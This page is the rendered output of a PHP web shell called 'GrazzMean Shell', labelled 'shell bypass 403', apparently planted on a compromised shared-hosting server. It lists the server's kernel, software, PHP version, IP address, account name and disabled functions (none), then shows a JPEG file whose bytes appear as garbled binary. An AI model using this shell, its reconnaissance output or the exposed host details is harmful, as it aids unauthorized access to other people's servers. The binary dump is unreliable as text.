shell bypass 403

GrazzMean Shell

Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : samsung-Blog-Image-48x20.jpg
���JFIF��BExifMM*1Adobe Photoshop 22.0 (Windows)��	�http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmp:CreatorTool="Adobe Photoshop 22.0 (Windows)"/> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��0����)!1q"#Q23Aab����#!1A�#3���?�MV����6�K�m�d%�lz>uL�'�B�%�rpedTuTF)�+c#��V�y�R�Cn��gg��G�TA�}�3&�Gd�;�Uf-c������&Q��`U��x��5)�UhP��	�Y��ې���plV�n_O82��r^:vvC��UQ����ʪh�����Vfn`+��DַHGrM	:W�@'�?K|UO�����]��E:N�����de�L�C�A�pX�1KT�}�ISz!�L)(;�X��Kl%��}�W����j/r��a6���[�5�0����)m��u�\��I����m=&�ˉ^I�#/s�(7nyZ��u4�NΚ�_NA4x�oaf`��l�I���	?��
© 2025 GrazzMean